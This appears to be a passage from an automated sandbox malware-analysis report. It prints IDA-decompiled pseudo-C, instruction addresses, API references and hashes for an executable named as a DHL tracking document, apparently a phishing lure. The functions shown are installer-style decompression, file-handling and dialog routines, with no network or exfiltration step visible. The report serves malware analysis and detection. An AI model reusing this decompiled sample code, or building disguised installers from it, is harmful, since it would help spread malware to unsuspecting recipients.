                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                    														 *__esi = __dx;
                    													}
                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                    													if( *(__ebp - 0x10) >= 0x1000000) {
                    														L111:
                    														_t368 = __ebp - 0x48;
                    														 *_t368 =  *(__ebp - 0x48) + 1;
                    														__eflags =  *_t368;
                    														goto L112;
                    													} else {
                    														goto L109;
                    													}
                    												}
                    												__ecx =  *(__ebp - 0xc);
                    												__ebx = __ebx + __ebx;
                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    												 *(__ebp - 0x44) = __ebx;
                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                    													__ecx =  *(__ebp - 0x10);
                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                    													__ebx = __ebx | 0x00000001;
                    													__eflags = __ebx;
                    													 *(__ebp - 0x44) = __ebx;
                    												}
                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                    												if( *(__ebp - 0x10) >= 0x1000000) {
                    													L101:
                    													_t338 = __ebp - 0x48;
                    													 *_t338 =  *(__ebp - 0x48) - 1;
                    													__eflags =  *_t338;
                    													goto L102;
                    												} else {
                    													goto L99;
                    												}
                    											}
                    											__edx =  *(__ebp - 4);
                    											__eax = __eax - __ebx;
                    											 *(__ebp - 0x40) = __ecx;
                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                    											goto L108;
                    										case 0x1a:
                    											L56:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1a;
                    												goto L170;
                    											}
                    											__ecx =  *(__ebp - 0x68);
                    											__al =  *(__ebp - 0x5c);
                    											__edx =  *(__ebp - 8);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    											 *( *(__ebp - 0x68)) = __al;
                    											__ecx =  *(__ebp - 0x14);
                    											 *(__ecx +  *(__ebp - 8)) = __al;
                    											__eax = __ecx + 1;
                    											__edx = 0;
                    											_t192 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t192;
                    											goto L79;
                    										case 0x1b:
                    											L75:
                    											__eflags =  *(__ebp - 0x64);
                    											if( *(__ebp - 0x64) == 0) {
                    												 *(__ebp - 0x88) = 0x1b;
                    												goto L170;
                    											}
                    											__eax =  *(__ebp - 0x14);
                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    											__eflags = __eax -  *(__ebp - 0x74);
                    											if(__eax >=  *(__ebp - 0x74)) {
                    												__eax = __eax +  *(__ebp - 0x74);
                    												__eflags = __eax;
                    											}
                    											__edx =  *(__ebp - 8);
                    											__cl =  *(__eax + __edx);
                    											__eax =  *(__ebp - 0x14);
                    											 *(__ebp - 0x5c) = __cl;
                    											 *(__eax + __edx) = __cl;
                    											__eax = __eax + 1;
                    											__edx = 0;
                    											_t274 = __eax %  *(__ebp - 0x74);
                    											__eax = __eax /  *(__ebp - 0x74);
                    											__edx = _t274;
                    											__eax =  *(__ebp - 0x68);
                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    											_t283 = __ebp - 0x64;
                    											 *_t283 =  *(__ebp - 0x64) - 1;
                    											__eflags =  *_t283;
                    											 *( *(__ebp - 0x68)) = __cl;
                    											L79:
                    											 *(__ebp - 0x14) = __edx;
                    											goto L80;
                    										case 0x1c:
                    											while(1) {
                    												L123:
                    												__eflags =  *(__ebp - 0x64);
                    												if( *(__ebp - 0x64) == 0) {
                    													break;
                    												}
                    												__eax =  *(__ebp - 0x14);
                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                    												__eflags = __eax -  *(__ebp - 0x74);
                    												if(__eax >=  *(__ebp - 0x74)) {
                    													__eax = __eax +  *(__ebp - 0x74);
                    													__eflags = __eax;
                    												}
                    												__edx =  *(__ebp - 8);
                    												__cl =  *(__eax + __edx);
                    												__eax =  *(__ebp - 0x14);
                    												 *(__ebp - 0x5c) = __cl;
                    												 *(__eax + __edx) = __cl;
                    												__eax = __eax + 1;
                    												__edx = 0;
                    												_t414 = __eax %  *(__ebp - 0x74);
                    												__eax = __eax /  *(__ebp - 0x74);
                    												__edx = _t414;
                    												__eax =  *(__ebp - 0x68);
                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                    												__eflags =  *(__ebp - 0x30);
                    												 *( *(__ebp - 0x68)) = __cl;
                    												 *(__ebp - 0x14) = _t414;
                    												if( *(__ebp - 0x30) > 0) {
                    													continue;
                    												} else {
                    													L80:
                    													 *(__ebp - 0x88) = 2;
                    													goto L1;
                    												}
                    											}
                    											 *(__ebp - 0x88) = 0x1c;
                    											goto L170;
                    									}
                    								}
                    								L171:
                    								_t535 = _t534 | 0xffffffff;
                    								goto L172;
                    							}
                    						}
                    					}
                    				}
                    			}













                    0x00406507
                    0x0040650d
                    0x0040650f
                    0x0040650f
                    0x0040650f
                    0x00406512
                    0x00406515
                    0x00000000
                    0x00000000
                    0x004060e5
                    0x004060e5
                    0x004060e9
                    0x00406856
                    0x00000000
                    0x00406856
                    0x004060ef
                    0x004060f2
                    0x004060f5
                    0x004060f9
                    0x004060fc
                    0x00406102
                    0x00406104
                    0x00406104
                    0x00406104
                    0x00406107
                    0x0040610a
                    0x0040610a
                    0x0040610d
                    0x00406110
                    0x00000000
                    0x00000000
                    0x00406116
                    0x0040611c
                    0x00000000
                    0x00000000
                    0x00406122
                    0x00406122
                    0x00406126
                    0x00406129
                    0x0040612c
                    0x0040612f
                    0x00406132
                    0x00406133
                    0x00406136
                    0x00406138
                    0x0040613e
                    0x00406141
                    0x00406144
                    0x00406147
                    0x0040614a
                    0x0040614d
                    0x00406150
                    0x0040616c
                    0x0040616f
                    0x00406172
                    0x00406175
                    0x0040617c
                    0x00406180
                    0x00406182
                    0x00406186
                    0x00406152
                    0x00406152
                    0x00406156
                    0x0040615e
                    0x00406163
                    0x00406165
                    0x00406167
                    0x00406167
                    0x00406189
                    0x00406190
                    0x00406193
                    0x00000000
                    0x00406199
                    0x00000000
                    0x00406199
                    0x00000000
                    0x0040619e
                    0x0040619e
                    0x004061a2
                    0x00406862
                    0x00000000
                    0x00406862
                    0x004061a8
                    0x004061ab
                    0x004061ae
                    0x004061b2
                    0x004061b5
                    0x004061bb
                    0x004061bd
                    0x004061bd
                    0x004061bd
                    0x004061c0
                    0x004061c3
                    0x004061c3
                    0x004061c3
                    0x004061c9
                    0x00000000
                    0x00000000
                    0x004061cb
                    0x004061ce
                    0x004061d1
                    0x004061d4
                    0x004061d7
                    0x004061da
                    0x004061dd
                    0x004061e0
                    0x004061e3
                    0x004061e6
                    0x004061e9
                    0x00406201
                    0x00406204
                    0x00406207
                    0x0040620a
                    0x0040620a
                    0x0040620d
                    0x00406211
                    0x00406213
                    0x004061eb
                    0x004061eb
                    0x004061f3
                    0x004061f8
                    0x004061fa
                    0x004061fc
                    0x004061fc
                    0x00406216
                    0x0040621d
                    0x00406220
                    0x00000000
                    0x00406222
                    0x00000000
                    0x00406222
                    0x00406220
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00406227
                    0x00000000
                    0x00000000
                    0x00406262
                    0x00406262
                    0x00406266
                    0x0040686e
                    0x00000000
                    0x0040686e
                    0x0040626c
                    0x0040626f
                    0x00406272
                    0x00406276
                    0x00406279
                    0x0040627f
                    0x00406281
                    0x00406281
                    0x00406281
                    0x00406284
                    0x00406287
                    0x00406287
                    0x0040628d
                    0x0040622b
                    0x0040622b
                    0x0040622e
                    0x00000000
                    0x0040622e
                    0x0040628f
                    0x0040628f
                    0x00406292
                    0x00406295
                    0x00406298
                    0x0040629b
                    0x0040629e
                    0x004062a1
                    0x004062a4
                    0x004062a7
                    0x004062aa
                    0x004062ad
                    0x004062c5
                    0x004062c8
                    0x004062cb
                    0x004062ce
                    0x004062ce
                    0x004062d1
                    0x004062d5
                    0x004062d7
                    0x004062af
                    0x004062af
                    0x004062b7
                    0x004062bc
                    0x004062be
                    0x004062c0
                    0x004062c0
                    0x004062da
                    0x004062e1
                    0x004062e4
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x004062e6
                    0x00000000
                    0x00406573
                    0x00406573
                    0x00406577
                    0x0040689e
                    0x00000000
                    0x0040689e
                    0x0040657d
                    0x00406580
                    0x00406583
                    0x00406587
                    0x0040658a
                    0x00406590
                    0x00406592
                    0x00406592
                    0x00406592
                    0x00406595
                    0x00000000
                    0x00000000
                    0x00406343
                    0x00406343
                    0x00406346
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x00000000
                    0x00406682
                    0x00406686
                    0x004066a8
                    0x004066ab
                    0x004066b5
                    0x004066b8
                    0x004066b8
                    0x00000000
                    0x004066b8
                    0x004066b8
                    0x00406688
                    0x0040668b
                    0x0040668f
                    0x00406692
                    0x00406692
                    0x00406695
                    0x00000000
                    0x00000000
                    0x0040673f
                    0x00406743
                    0x00406761
                    0x00406761
                    0x00406761
                    0x00406768
                    0x0040676f
                    0x00406776
                    0x00406776
                    0x00000000
                    0x00406776
                    0x00406745
                    0x00406748
                    0x0040674b
                    0x0040674e
                    0x00406755
                    0x00406699
                    0x00406699
                    0x0040669c
                    0x00000000
                    0x00000000
                    0x00406830
                    0x00406833
                    0x00406734
                    0x00000000
                    0x00000000
                    0x0040646a
                    0x0040646c
                    0x00406473
                    0x00406474
                    0x00406476
                    0x00406479
                    0x00000000
                    0x00000000
                    0x00406481
                    0x00406484
                    0x00406487
                    0x00406489
                    0x0040648b
                    0x0040648b
                    0x0040648c
                    0x0040648f
                    0x00406496
                    0x00406499
                    0x004064a7
                    0x00000000
                    0x00000000
                    0x0040677d
                    0x0040677d
                    0x00406780
                    0x00406787
                    0x00000000
                    0x00000000
                    0x0040678c
                    0x0040678c
                    0x00406790
                    0x004068c8
                    0x00000000
                    0x004068c8
                    0x00406796
                    0x00406799
                    0x0040679c
                    0x004067a0
                    0x004067a3
                    0x004067a9
                    0x004067ab
                    0x004067ab
                    0x004067ab
                    0x004067ae
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b1
                    0x004067b4
                    0x004067b4
                    0x004067b8
                    0x00406818
                    0x0040681b
                    0x00406820
                    0x00406821
                    0x00406823
                    0x00406825
                    0x00406828
                    0x00406734
                    0x00406734
                    0x00000000
                    0x0040673a
                    0x00406734
                    0x004067ba
                    0x004067c0
                    0x004067c3
                    0x004067c6
                    0x004067c9
                    0x004067cc
                    0x004067cf
                    0x004067d2
                    0x004067d5
                    0x004067d8
                    0x004067db
                    0x004067f4
                    0x004067f7
                    0x004067fa
                    0x004067fd
                    0x00406801
                    0x00406803
                    0x00406803
                    0x00406804
                    0x00406807
                    0x004067dd
                    0x004067dd
                    0x004067e5
                    0x004067ea
                    0x004067ec
                    0x004067ef
                    0x004067ef
                    0x0040680a
                    0x00406811
                    0x00000000
                    0x00406813
                    0x00000000
                    0x00406813
                    0x00000000
                    0x004064af
                    0x004064b2
                    0x004064e8
                    0x00406618
                    0x00406618
                    0x00406618
                    0x00406618
                    0x0040661b
                    0x0040661b
                    0x0040661e
                    0x00406620
                    0x004068aa
                    0x00000000
                    0x004068aa
                    0x00406626
                    0x00406629
                    0x00000000
                    0x00000000
                    0x0040662f
                    0x00406633
                    0x00406636
                    0x00406636
                    0x00406636
                    0x00000000
                    0x00406636
                    0x004064b4
                    0x004064b6
                    0x004064b8
                    0x004064ba
                    0x004064bd
                    0x004064be
                    0x004064c0
                    0x004064c2
                    0x004064c5
                    0x004064c8
                    0x004064de
                    0x004064e3
                    0x0040651b
                    0x0040651b
                    0x0040651f
                    0x0040654b
                    0x0040654d
                    0x00406554
                    0x00406557
                    0x0040655a
                    0x0040655a
                    0x0040655f
                    0x0040655f
                    0x00406561
                    0x00406564
                    0x0040656b
                    0x0040656e
                    0x0040659b
                    0x0040659b
                    0x0040659e
                    0x004065a1
                    0x00406615
                    0x00406615
                    0x00406615
                    0x00000000
                    0x00406615
                    0x004065a3
                    0x004065a9
                    0x004065ac
                    0x004065af
                    0x004065b2
                    0x004065b5
                    0x004065b8
                    0x004065bb
                    0x004065be
                    0x004065c1
                    0x004065c4
                    0x004065dd
                    0x004065df
                    0x004065e2
                    0x004065e3
                    0x004065e6
                    0x004065e8
                    0x004065eb
                    0x004065ed
                    0x004065ef
                    0x004065f2
                    0x004065f4
                    0x004065f7
                    0x004065fb
                    0x004065fd
                    0x004065fd
                    0x004065fe
                    0x00406601
                    0x00406604
                    0x004065c6
                    0x004065c6
                    0x004065ce
                    0x004065d3
                    0x004065d5
                    0x004065d8
                    0x004065d8
                    0x00406607
                    0x0040660e
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00406598
                    0x00000000
                    0x00406610
                    0x00000000
                    0x00406610
                    0x0040660e
                    0x00406521
                    0x00406524
                    0x00406526
                    0x00406529
                    0x0040652c
                    0x0040652f
                    0x00406531
                    0x00406534
                    0x00406537
                    0x00406537
                    0x0040653a
                    0x0040653a
                    0x0040653d
                    0x00406544
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00406518
                    0x00000000
                    0x00406546
                    0x00000000
                    0x00406546
                    0x00406544
                    0x004064ca
                    0x004064cd
                    0x004064cf
                    0x004064d2
                    0x00000000
                    0x00000000
                    0x00406231
                    0x00406231
                    0x00406235
                    0x0040687a
                    0x00000000
                    0x0040687a
                    0x0040623b
                    0x0040623e
                    0x00406241
                    0x00406244
                    0x00406247
                    0x0040624a
                    0x0040624d
                    0x0040624f
                    0x00406252
                    0x00406255
                    0x00406258
                    0x0040625a
                    0x0040625a
                    0x0040625a
                    0x00000000
                    0x00000000
                    0x004063bc
                    0x004063bc
                    0x004063c0
                    0x00406886
                    0x00000000
                    0x00406886
                    0x004063c6
                    0x004063c9
                    0x004063cc
                    0x004063cf
                    0x004063d1
                    0x004063d1
                    0x004063d1
                    0x004063d4
                    0x004063d7
                    0x004063da
                    0x004063dd
                    0x004063e0
                    0x004063e3
                    0x004063e4
                    0x004063e6
                    0x004063e6
                    0x004063e6
                    0x004063e9
                    0x004063ec
                    0x004063ef
                    0x004063f2
                    0x004063f2
                    0x004063f2
                    0x004063f5
                    0x004063f7
                    0x004063f7
                    0x00000000
                    0x00000000
                    0x00406639
                    0x00406639
                    0x00406639
                    0x0040663d
                    0x00000000
                    0x00000000
                    0x00406643
                    0x00406646
                    0x00406649
                    0x0040664c
                    0x0040664e
                    0x0040664e
                    0x0040664e
                    0x00406651
                    0x00406654
                    0x00406657
                    0x0040665a
                    0x0040665d
                    0x00406660
                    0x00406661
                    0x00406663
                    0x00406663
                    0x00406663
                    0x00406666
                    0x00406669
                    0x0040666c
                    0x0040666f
                    0x00406672
                    0x00406676
                    0x00406678
                    0x0040667b
                    0x00000000
                    0x0040667d
                    0x004063fa
                    0x004063fa
                    0x00000000
                    0x004063fa
                    0x0040667b
                    0x004068b0
                    0x00000000
                    0x00000000
                    0x00405edf
                    0x004068e7
                    0x004068e7
                    0x00000000
                    0x004068e7
                    0x00406734
                    0x004066bb
                    0x004066b8

                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                    • Instruction ID: 03af6c1e27b970ccc0602dedbaa06cf660f45ac3eaa39f8bc43b8226cdf4d636
                    • Opcode Fuzzy Hash: c0236bc9d37fb86cbfb05d60328db13b4a1015dd2f3925378243861a98d78361
                    • Instruction Fuzzy Hash: 46715571D00229DFEF28CF98C844BADBBB1FB44305F15806AD816BB281C7789A96DF44
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				intOrPtr _t15;
                    				signed int _t16;
                    				signed int _t17;
                    				void* _t18;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t15 =  *0x423ed0; // 0x51030c
                    					_t6 = _t17 * 0x1c + _t15;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                    						 *0x42368c =  *0x42368c + _t12;
                    						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42368c, 0x7530,  *0x423674), 0);
                    					}
                    				}
                    				return 0;
                    			}













                    APIs
                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                    • Instruction ID: b71ad761f0ea07ecc4e6183a90c0cd8288537aab3e92bb5761005deb6e4a9b1f
                    • Opcode Fuzzy Hash: 7b8e9ba5108b55dad21e1cb19ef7846daac3b048e1c883625bc8c045044f289d
                    • Instruction Fuzzy Hash: 20014431B24210ABE7291B388D08B2A32ADE714315F10423FF801F32F0D678DC028B4C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E0040575C(CHAR* _a4, long _a8, long _a12) {
                    				signed int _t5;
                    				void* _t6;
                    
                    				_t5 = GetFileAttributesA(_a4); // executed
                    				asm("sbb ecx, ecx");
                    				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                    				return _t6;
                    			}






                    APIs
                    • GetFileAttributesA.KERNELBASE(00000003,00402C9E,C:\Users\user\Desktop\DHL AWB TRACKING DETAILS.exe,80000000,00000003), ref: 00405760
                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405782
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: File$AttributesCreate
                    • String ID:
                    • API String ID: 415043291-0
                    • Opcode ID: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                    • Instruction ID: 90a47e22fdd321f70bf06df01bfdefa11f3e73682391c7296034eb3a8fe04f39
                    • Opcode Fuzzy Hash: 6d56aff3fab625e069b8f0f4beb3d6c68df7a2746e2dd21b0a72e0224e52029a
                    • Instruction Fuzzy Hash: 8CD09E31658301AFEF098F20DD1AF2E7AA2EB84B00F10562CB646940E0D6715815DB16
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040573D(CHAR* _a4) {
                    				signed char _t3;
                    
                    				_t3 = GetFileAttributesA(_a4); // executed
                    				if(_t3 != 0xffffffff) {
                    					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                    				}
                    				return _t3;
                    			}





                    APIs
                    • GetFileAttributesA.KERNELBASE(?,00405548,?,?,?), ref: 00405741
                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405753
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: AttributesFile
                    • String ID:
                    • API String ID: 3188754299-0
                    • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction ID: 88d4634cff9a4ddd1fee40d2dea465eb4d792ab4199cb35d7d0d1e1f6e6e1bf9
                    • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                    • Instruction Fuzzy Hash: CAC04CB1808501EBD6016B24DF0D81F7B66EB50321B108B35F569E00F0C7755C66EA1A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004031A8(void* _a4, long _a8) {
                    				int _t6;
                    				long _t10;
                    
                    				_t10 = _a8;
                    				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                    				if(_t6 == 0 || _a8 != _t10) {
                    					return 0;
                    				} else {
                    					return 1;
                    				}
                    			}






                    APIs
                    • ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FileRead
                    • String ID:
                    • API String ID: 2738559852-0
                    • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
                    • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                    • Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E004031DA(long _a4) {
                    				long _t2;
                    
                    				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                    				return _t2;
                    			}





                    APIs
                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,00007DE4), ref: 004031E8
                    Memory Dump Source
                    • Source File: 00000000.00000002.361500476.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.361468689.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361533933.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361550279.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361628614.0000000000422000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361653485.0000000000429000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.361679445.000000000042C000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_DHL AWB TRACKING DETAILS.jbxd
                    Similarity
                    • API ID: FilePointer
                    • String ID:
                    • API String ID: 973152223-0
                    • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                    • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                    • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 96%
                    			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                    				struct HWND__* _v8;
                    				long _v12;
                    				struct tagRECT _v28;
                    				void* _v36;
                    				signed int _v40;
                    				int _v44;
                    				int _v48;
                    				signed int _v52;
                    				int _v56;
                    				void* _v60;
                    				void* _v68;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				long _t87;
                    				unsigned int _t92;
                    				unsigned int _t93;
                    				int _t94;
                    				int _t95;
                    				long _t98;
                    				void* _t101;
                    				intOrPtr _t112;
                    				intOrPtr _t123;
                    				struct HWND__* _t127;
                    				int _t149;
                    				int _t150;
                    				struct HWND__* _t154;
                    				struct HWND__* _t158;
                    				struct HMENU__* _t160;
                    				long _t162;
                    				void* _t163;
                    				short* _t164;
                    
                    				_t154 =  *0x423684; // 0x0
                    				_t149 = 0;
                    				_v8 = _t154;
                    				if(_a8 != 0x110) {
                    					__eflags = _a8 - 0x405;
                    					if(_a8 == 0x405) {
                    						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                    					}
                    					__eflags = _a8 - 0x111;
                    					if(_a8 != 0x111) {
                    						L17:
                    						__eflags = _a8 - 0x404;
                    						if(_a8 != 0x404) {
                    							L25:
                    							__eflags = _a8 - 0x7b;
                    							if(_a8 != 0x7b) {
                    								goto L20;
                    							}
                    							__eflags = _a12 - _t154;
                    							if(_a12 != _t154) {
                    								goto L20;
                    							}
                    							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                    							__eflags = _t87 - _t149;
                    							_a8 = _t87;
                    							if(_t87 <= _t149) {
                    								L37:
                    								return 0;
                    							}
                    							_t160 = CreatePopupMenu();
                    							AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
                    							_t92 = _a16;
                    							__eflags = _t92 - 0xffffffff;
                    							if(_t92 != 0xffffffff) {
                    								_t150 = _t92;
                    								_t93 = _t92 >> 0x10;
                    								__eflags = _t93;
                    								_t94 = _t93;
                    							} else {
                    								GetWindowRect(_t154,  &_v28);
                    								_t150 = _v28.left;
                    								_t94 = _v28.top;
                    							}
                    							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
